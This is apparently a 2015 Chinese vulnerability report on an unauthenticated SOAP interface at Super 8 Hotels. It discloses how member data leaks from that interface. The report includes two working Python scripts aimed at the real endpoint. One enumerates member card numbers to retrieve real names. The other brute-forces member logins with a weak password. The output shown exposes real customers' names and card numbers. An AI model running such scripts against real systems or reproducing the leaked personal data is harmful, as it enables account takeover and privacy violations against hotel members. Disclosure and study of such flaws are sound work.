飞扬风发布了速8酒店某处泄漏大量用户资料及订单信息

厂商忽略,后乌云补分 rank 13(提交前反查信息发现)白帽子飞扬风从APP分析的角度,使用burp进行抓包改包,由于burp编码的原因汉字显示不正常,未引起厂商重视。时隔一年,我通过百度无意间搜索到速8酒店一接口:

https://www0.super8.com.cn/mobileInterface/Super8Interface.asmx



通过对速8酒店各接口分析,发现SOAP接口未验证权限,也未设置内部访问,导致未授权访问泄露用户卡号,实名,获得卡号后可对密码进行爆破。说明及演示如下:
 

QQ截图20150219195917.png



速8酒店的说明做的真的不错,文档全中文,说明详细。最底部:getCustInfo

根据会员卡号查询会员实体接口(按手机号/会员卡号验证登录密码,成功后返回会员卡号,会员姓名,会员类型,可享受会员价格)

打开看看:
 

QQ截图20150219200137.png



意思只要会员卡号正确就能返回卡号,会员姓名

文档里还有示例真心不错,那就用get方法测试一下,简单写了个python脚本:

import re from BeautifulSoup import BeautifulSoup # For processing HTML import BeautifulSoup # To get everything from bs4 import BeautifulSoup; try: import requests except ImportError: raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!') print '\n速八酒店会员卡验证\n' for cardNo in xrange(1, 9): a=600130919 payload = {'cardNo': a+cardNo} s = requests.get('https://www0.super8.com.cn/mobileInterface/Super8Interface.asmx/getCustInfo?cardNo',params=payload) soup = BeautifulSoup(s.content) content= soup.findAll(name='content') print soup.content



卡号设置从600130919开始,简单说明一下我没有速8的会员卡,百度得到这张图片
 

71abafec8a1363275a827a95908fa0ec09fac799.jpg

600110882,测试的时候遍历了9999张,选这个开始是为了演示爆破(卡号+实名 为了演示只显示前2),程序运行结果:

速八酒店会员卡验证 <content> <cardno>600130920</cardno> <custname>马本惠</custname> <membertype>贵宾会员</membertype> <pricetypelist> <string>VIP</string> <string>EVIP</string> <string>WEB</string> </pricetypelist> </content> <content> <cardno>600130921</cardno> <custname>陈跃林</custname> <membertype>贵宾会员</membertype> <pricetypelist> <string>VIP</string> <string>EVIP</string> <string>WEB</string> </pricetypelist> </content> <content>



有了卡号,我们就可以去爆破密码,还是用脚本测试

接口地址


https://www0.super8.com.cn/mobileInterface/Super8Interface.asmx?op=CustLoginEx

接口说明:CustLoginEx

会员登录返回会员实体接口(按手机号/会员卡号验证登录密码,成功后返回会员卡号,会员姓名,会员类型,可享受会员价格)

QQ截图20150219201307.png



脚本如下(假设密码为弱口令123456,只是简单写了一下,python也可以从文件读取密码,这里仅作演示):

try: import requests except ImportError: raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!') print '\n速八酒店会员用户登录验证\n' for loginName in xrange(1, 9): a=600130919 payload = {'loginName': a+loginName,'loginPwd': '123456'} s = requests.get('https://www0.super8.com.cn/mobileInterface/Super8Interface.asmx/CustLoginEx?loginName&loginPwd',params=payload) print '\n正在测试:',a+loginName print '\n' + s.content



测试结果如下(脚本过于简陋,只为说明问题,见谅):

速八酒店会员用户登录验证 正在测试: 600130920 <?xml version="1.0" encoding="utf-8"?> <MessagePacketOfCustome xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="https://www.w3.org/2001/XMLSchema" xmlns="https://www.super8.com.cn/"> <IsError>false</IsError> <ResultCode>00</ResultCode> <Message /> <Content> <cardNo>600130920</cardNo> <custName>马本惠</custName> <membertype>贵宾会员</membertype> <pricetypelist> <string>VIP</string> <string>EVIP</string> <string>WEB</string> </pricetypelist> </Content> <CurTime>2015-02-19T20:15:32.3564357+08:00</CurTime> </MessagePacketOfCustome> 正在测试: 600130921 <?xml version="1.0" encoding="utf-8"?> <MessagePacketOfCustome xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="https://www.w3.org/2001/XMLSchema" xmlns="https://www.super8.com.cn/"> <IsError>true</IsError> <ResultCode>22</ResultCode> <Message>鐢ㄦ埛鎴栧瘑鐮佷笉姝g‘</Message> <CurTime>2015-02-19T20:15:32.715238+08:00</CurTime> </MessagePacketOfCustome>